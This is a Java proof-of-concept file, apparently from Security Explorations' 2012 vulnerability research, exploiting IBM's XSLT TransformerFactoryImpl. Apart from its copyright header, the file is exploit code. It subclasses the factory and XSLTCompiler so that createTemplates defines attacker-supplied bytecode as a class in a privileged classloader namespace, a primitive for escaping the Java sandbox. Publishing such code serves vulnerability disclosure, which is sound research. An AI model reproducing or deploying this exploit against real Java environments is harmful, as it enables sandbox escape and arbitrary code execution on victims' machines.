/*## (c) SECURITY EXPLORATIONS    2012 poland                                #*/
/*##     http://www.security-explorations.com                                #*/

/* com.ibm.xtq.xslt.jaxp.compiler.TransformerFactoryImpl                      */
/* arbitrary class definition in a privileged classloader namespace           */

/* THIS SOFTWARE IS PROTECTED BY DOMESTIC AND INTERNATIONAL COPYRIGHT LAWS    */
/* UNAUTHORISED COPYING OF THIS SOFTWARE IN EITHER SOURCE OR BINARY FORM IS   */
/* EXPRESSLY FORBIDDEN. ANY USE, INCLUDING THE REPRODUCTION, MODIFICATION,    */
/* DISTRIBUTION, TRANSMISSION, RE-PUBLICATION, STORAGE OR DISPLAY OF ANY      */
/* PART OF THE SOFTWARE, FOR COMMERCIAL OR ANY OTHER PURPOSES REQUIRES A      */
/* VALID LICENSE FROM THE COPYRIGHT HOLDER.                                   */

/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS    */
/* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,*/
/* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL    */
/* SECURITY EXPLORATIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, */
/* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF  */
/* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE     */
/* SOFTWARE.                                                                  */

import java.lang.*;
import java.lang.reflect.*;
import com.ibm.xtq.xslt.jaxp.compiler.*;
import com.ibm.xtq.xslt.drivers.*;
import com.ibm.xtq.xslt.jaxp.*;

public class Vuln49 {
 public static class MyTransformerFactoryImpl extends TransformerFactoryImpl {

  public boolean getBooleanAttribute(String s) {
   return true;
  }

  public int getIntAttribute(String s) {
   return 0;
  }
 }

 public static class MyXSLTCompiler extends XSLTCompiler {
  String name;
  byte[] def;

  public MyXSLTCompiler(String name,byte[] def) {
   this.name=name;
   this.def=def;
  }

  public String[] getNames() {
   String names[]=new String[1];
   names[0]=name;

   return names;
  }

  public byte[][] getBytecodes() {
   byte defs[][]=new byte[1][];
   defs[0]=def;

   return defs;
  }
 }

 public static Class define_privileged_class(String name,byte[] def) throws Throwable {
  MyTransformerFactoryImpl mtfi=new MyTransformerFactoryImpl();
  MyXSLTCompiler mxc=new MyXSLTCompiler(name,def);

  TemplatesImpl ti=mtfi.createTemplates(mxc,name);
  Class ctab[]=ti.getTransletClasses();

  return ctab[0];
 }
}
